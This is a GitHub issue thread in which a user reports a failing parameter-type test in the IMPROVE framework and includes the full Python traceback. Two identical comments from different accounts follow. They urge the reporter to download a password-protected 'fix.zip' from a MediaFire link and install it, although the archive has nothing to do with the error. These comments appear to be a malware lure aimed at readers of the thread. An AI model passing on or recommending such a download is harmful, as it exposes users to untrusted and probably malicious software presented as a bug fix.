### ISSUE TITLE
Unsupported type <class 'list'> for option split in testing

### ISSUE THREAD

**Issue by wilke** [JDACS4C-IMPROVE/IMPROVE#79]
Command: python test_params.py TestTypePreprocessConfigs.test_preprocess_default_type_string
Branch: framework-api

======================================================================
ERROR: test_preprocess_default_type_string (__main__.TestTypePreprocessConfigs)
PREPROCESS: Check type for string parameter.
----------------------------------------------------------------------
Traceback (most recent call last):
  File "test_params.py", line 159, in test_preprocess_default_type_string
    preprocess_params = model_preprocess_improve.main(sys.argv[1:])
  File "/Users/me/Development/IMPROVE/IMPROVE/tests/model_preprocess_improve.py", line 52, in main
    required=None
  File "/Users/me/Development/IMPROVE/IMPROVE/improvelib/initializer/stage_config.py", line 77, in initialize_parameters
    required=required)
  File "/Users/me/Development/IMPROVE/IMPROVE/improvelib/initializer/config.py", line 674, in initialize_parameters
    self.set_command_line_options(options=updated_definitions)
  File "/Users/me/Development/IMPROVE/IMPROVE/improvelib/initializer/config.py", line 186, in set_command_line_options
    self._update_options()
  File "/Users/me/Development/IMPROVE/IMPROVE/improvelib/initializer/config.py", line 116, in _update_options
    self._add_option(action.dest, action.__dict__)
  File "/Users/me/Development/IMPROVE/IMPROVE/improvelib/initializer/config.py", line 105, in _add_option
    sys.exit(1)
SystemExit: 1

----------------------------------------------------------------------
Ran 1 test in 0.005s

FAILED (errors=1)

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
